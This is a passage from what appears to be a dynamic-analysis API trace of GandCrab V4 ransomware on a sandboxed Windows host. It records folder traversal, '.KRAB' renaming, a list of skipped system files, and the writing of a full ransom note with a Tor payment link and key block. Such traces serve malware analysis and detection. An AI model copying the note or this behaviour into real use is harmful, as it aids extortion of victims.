(lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.867] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned 69 [0056.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0056.867] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbe0a0 [0056.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.867] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.867] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.867] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.867] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.867] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.867] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock" [0056.867] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.868] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 97 [0056.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\d2ca4a08d2ca4dee3d.lock") returned 92 [0056.868] lstrlenW (lpString=".lock") returned 5 [0056.868] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.868] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.868] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.869] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.869] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.869] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.869] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.869] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt" [0056.869] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.869] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt.KRAB") returned 90 [0056.869] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt") returned 85 [0056.869] lstrlenW (lpString=".txt") returned 4 [0056.869] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.870] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.870] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt") returned 85 [0056.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\KRAB-DECRYPT.txt") returned 85 [0056.870] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.870] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.870] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.902] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.904] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.904] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.904] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.904] lstrcmpW (lpString1="NativeCache.directory", lpString2=".") returned 1 [0056.905] lstrcmpW (lpString1="NativeCache.directory", lpString2="..") returned 1 [0056.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2="NativeCache.directory" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory" [0056.905] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.905] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory.KRAB") returned 95 [0056.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0056.905] lstrlenW (lpString=".directory") returned 10 [0056.905] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.905] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".directory ") returned 11 [0056.906] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0056.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory") returned 90 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="desktop.ini") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="autorun.inf") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntuser.dat") returned -1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="iconcache.db") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="bootsect.bak") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="boot.ini") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntuser.dat.log") returned -1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="thumbs.db") returned -1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="KRAB-DECRYPT.html") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="KRAB-DECRYPT.txt") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="CRAB-DECRYPT.txt") returned 1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ntldr") returned -1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="NTDETECT.COM") returned -1 [0056.906] lstrcmpiW (lpString1="NativeCache.directory", lpString2="Bootfont.bin") returned 1 [0056.907] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.907] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0056.907] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.907] CloseHandle (hObject=0x44c) returned 1 [0056.907] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0056.907] FindClose (in: hFindFile=0xfbdce0 | out: hFindFile=0xfbdce0) returned 1 [0056.908] CloseHandle (hObject=0x430) returned 1 [0056.908] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.908] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0056.908] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0056.908] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Headlights" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights" [0056.908] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\" [0056.908] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.908] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.909] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.909] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.909] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\\\KRAB-DECRYPT.txt") returned 72 [0056.909] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\headlights\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0056.942] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.942] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.943] CloseHandle (hObject=0x430) returned 1 [0056.943] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.944] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.944] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x8c)) [0056.944] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.944] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.944] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.945] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock") returned 78 [0056.945] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\headlights\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0056.945] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.945] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\") returned 55 [0056.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*" [0056.946] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdce0 [0056.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.946] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.946] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.946] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.946] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock" [0056.946] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.946] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0056.947] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a08d2ca4dee3d.lock") returned 78 [0056.947] lstrlenW (lpString=".lock") returned 5 [0056.947] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.947] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.947] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.947] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.948] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.948] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.948] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.948] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt" [0056.948] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.948] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt.KRAB") returned 76 [0056.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt") returned 71 [0056.948] lstrlenW (lpString=".txt") returned 4 [0056.948] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.948] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.949] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt") returned 71 [0056.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\KRAB-DECRYPT.txt") returned 71 [0056.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.950] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.950] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.950] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0056.950] FindClose (in: hFindFile=0xfbdce0 | out: hFindFile=0xfbdce0) returned 1 [0056.950] CloseHandle (hObject=0x430) returned 1 [0056.951] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.951] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.951] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt" [0056.951] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.951] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt.KRAB") returned 65 [0056.951] lstrlenW 